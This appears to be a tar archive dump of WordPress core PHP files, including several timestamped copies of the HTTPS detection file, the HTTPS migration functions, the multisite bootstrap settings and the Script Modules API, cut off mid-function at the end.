function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260607015444.php 0000666 00000011205 15224151220 0011771 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
ms-settings-20260621173653.php 0000666 00000010154 15224151220 0011122 0 ustar 00 <?php
/**
* Used to set up and fix common variables and include
* the Multisite procedural and class library.
*
* Allows for some configuration in wp-config.php (see ms-default-constants.php)
*
* @package WordPress
* @subpackage Multisite
* @since 3.0.0
*/
// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
die( '-1' );
}
/**
* Objects representing the current network and current site.
*
* These may be populated through a custom `sunrise.php`. If not, then this
* file will attempt to populate them based on the current request.
*
* @since 3.0.0
*
* @global WP_Network $current_site The current network.
* @global object $current_blog The current site.
* @global string $domain Deprecated. The domain of the site found on load.
* Use `get_site()->domain` instead.
* @global string $path Deprecated. The path of the site found on load.
* Use `get_site()->path` instead.
* @global int $site_id Deprecated. The ID of the network found on load.
* Use `get_current_network_id()` instead.
* @global bool $public Deprecated. Whether the site found on load is public.
* Use `get_site()->public` instead.
*/
global $current_site, $current_blog, $domain, $path, $site_id, $public;
/** WP_Network class */
require_once ABSPATH . WPINC . '/class-wp-network.php';
/** WP_Site class */
require_once ABSPATH . WPINC . '/class-wp-site.php';
/** Multisite loader */
require_once ABSPATH . WPINC . '/ms-load.php';
/** Default Multisite constants */
require_once ABSPATH . WPINC . '/ms-default-constants.php';
if ( defined( 'SUNRISE' ) ) {
include_once WP_CONTENT_DIR . '/sunrise.php';
}
/** Check for and define SUBDOMAIN_INSTALL and the deprecated VHOST constant. */
ms_subdomain_constants();
// This block will process a request if the current network or current site objects
// have not been populated in the global scope through something like `sunrise.php`.
if ( ! isset( $current_site ) || ! isset( $current_blog ) ) {
$domain = strtolower( stripslashes( $_SERVER['HTTP_HOST'] ?? '' ) );
if ( str_ends_with( $domain, ':80' ) ) {
$domain = substr( $domain, 0, -3 );
$_SERVER['HTTP_HOST'] = substr( $_SERVER['HTTP_HOST'], 0, -3 );
} elseif ( str_ends_with( $domain, ':443' ) ) {
$domain = substr( $domain, 0, -4 );
$_SERVER['HTTP_HOST'] = substr( $_SERVER['HTTP_HOST'], 0, -4 );
}
$path = stripslashes( $_SERVER['REQUEST_URI'] );
if ( is_admin() ) {
$path = preg_replace( '#(.*)/wp-admin/.*#', '$1/', $path );
}
list( $path ) = explode( '?', $path );
$bootstrap_result = ms_load_current_site_and_network( $domain, $path, is_subdomain_install() );
if ( true === $bootstrap_result ) {
// `$current_blog` and `$current_site` are now populated.
} elseif ( false === $bootstrap_result ) {
ms_not_installed( $domain, $path );
} else {
header( 'Location: ' . $bootstrap_result );
exit;
}
unset( $bootstrap_result );
$blog_id = $current_blog->blog_id;
$public = $current_blog->public;
if ( empty( $current_blog->site_id ) ) {
// This dates to [MU134] and shouldn't be relevant anymore,
// but it could be possible for arguments passed to insert_blog() etc.
$current_blog->site_id = 1;
}
$site_id = $current_blog->site_id;
wp_load_core_site_options( $site_id );
}
$wpdb->set_prefix( $table_prefix, false ); // $table_prefix can be set in sunrise.php.
$wpdb->set_blog_id( $current_blog->blog_id, $current_blog->site_id );
$table_prefix = $wpdb->get_blog_prefix();
$_wp_switched_stack = array();
$switched = false;
// Need to init cache again after blog_id is set.
wp_start_object_cache();
if ( ! $current_site instanceof WP_Network ) {
$current_site = new WP_Network( $current_site );
}
if ( ! $current_blog instanceof WP_Site ) {
$current_blog = new WP_Site( $current_blog );
}
// Define upload directory constants.
ms_upload_constants();
/**
* Fires after the current site and network have been detected and loaded
* in multisite's bootstrap.
*
* @since 4.6.0
*/
do_action( 'ms_loaded' );
https-detection-20260607154209-20260621081102.php 0000666 00000013341 15224151220 0013340 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605080452.php 0000666 00000013341 15224151220 0011760 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
script-modules.php 0000666 00000023267 15224151220 0010237 0 ustar 00 <?php
/**
* Script Modules API: Script Module functions
*
* @since 6.5.0
*
* @package WordPress
* @subpackage Script Modules
*/
/**
* Retrieves the main WP_Script_Modules instance.
*
* This function provides access to the WP_Script_Modules instance, creating one
* if it doesn't exist yet.
*
* @since 6.5.0
*
* @global WP_Script_Modules $wp_script_modules
*
* @return WP_Script_Modules The main WP_Script_Modules instance.
*/
function wp_script_modules(): WP_Script_Modules {
global $wp_script_modules;
if ( ! ( $wp_script_modules instanceof WP_Script_Modules ) ) {
$wp_script_modules = new WP_Script_Modules();
}
return $wp_script_modules;
}
/**
* Registers the script module if no script module with that script module
* identifier has already been registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_register_script_module( string $id, string $src, array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->register( $id, $src, $deps, $version, $args );
}
/**
* Marks the script module to be enqueued in the page.
*
* If a src is provided and the script module has not been registered yet, it
* will be registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_enqueue_script_module( string $id, string $src = '', array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->enqueue( $id, $src, $deps, $version, $args );
}
/**
* Unmarks the script module so it is no longer enqueued in the page.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_dequeue_script_module( string $id ) {
wp_script_modules()->dequeue( $id );
}
/**
* Deregisters the script module.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_deregister_script_module( string $id ) {
wp_script_modules()->deregister( $id );
}
/**
* Registers all the default WordPress Script Modules.
*
* @since 6.7.0
*/
function wp_default_script_modules() {
$suffix = defined( 'WP_RUN_CORE_TESTS' ) ? '.min' : wp_scripts_get_suffix();
/*
* Expects multidimensional array like:
*
* 'interactivity/index.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity/debug.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity-router/index.min.js' => …
*/
$assets = include ABSPATH . WPINC . "/assets/script-modules-packages{$suffix}.php";
foreach ( $assets as $file_name => $script_module_data ) {
/*
* Build the WordPress Script Module ID from the file name.
* Prepend `@wordpress/` and remove extensions and `/index` if present:
* - interactivity/index.min.js => @wordpress/interactivity
* - interactivity/debug.min.js => @wordpress/interactivity/debug
* - block-library/query/view.js => @wordpress/block-library/query/view
*/
$script_module_id = '@wordpress/' . preg_replace( '~(?:/index)?(?:\.min)?\.js$~D', '', $file_name, 1 );
switch ( $script_module_id ) {
/*
* Interactivity exposes two entrypoints, "/index" and "/debug".
* "/debug" should replace "/index" in development.
*/
case '@wordpress/interactivity/debug':
if ( ! SCRIPT_DEBUG ) {
continue 2;
}
$script_module_id = '@wordpress/interactivity';
break;
case '@wordpress/interactivity':
if ( SCRIPT_DEBUG ) {
continue 2;
}
break;
}
/*
* The Interactivity API is designed with server-side rendering as its primary goal, so all of its script modules
* should be loaded with low fetchpriority and printed in the footer since they should not be needed in the
* critical rendering path. Also, the @wordpress/a11y script module is intended to be used as a dynamic import
* dependency, in which case the fetchpriority is irrelevant. See <https://make.wordpress.org/core/2024/10/14/updates-to-script-modules-in-6-7/>.
* However, in case it is added as a static import dependency, the fetchpriority is explicitly set to be 'low'
* since the module should not be involved in the critical rendering path, and if it is, its fetchpriority will
* be bumped to match the fetchpriority of the dependent script.
*/
$args = array();
if (
str_starts_with( $script_module_id, '@wordpress/interactivity' ) ||
str_starts_with( $script_module_id, '@wordpress/block-library' ) ||
'@wordpress/a11y' === $script_module_id
) {
$args['fetchpriority'] = 'low';
$args['in_footer'] = true;
}
// Marks all Core blocks as compatible with client-side navigation.
if ( str_starts_with( $script_module_id, '@wordpress/block-library' ) ) {
wp_interactivity()->add_client_navigation_support_to_script_module( $script_module_id );
}
$path = includes_url( "js/dist/script-modules/{$file_name}" );
wp_register_script_module( $script_module_id, $path, $script_module_data['dependencies'], $script_module_data['version'], $args );
}
}
https-detection-20260605034026-20260621081121-20260621143209.php 0000666 00000013341 15224151220 0014714 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
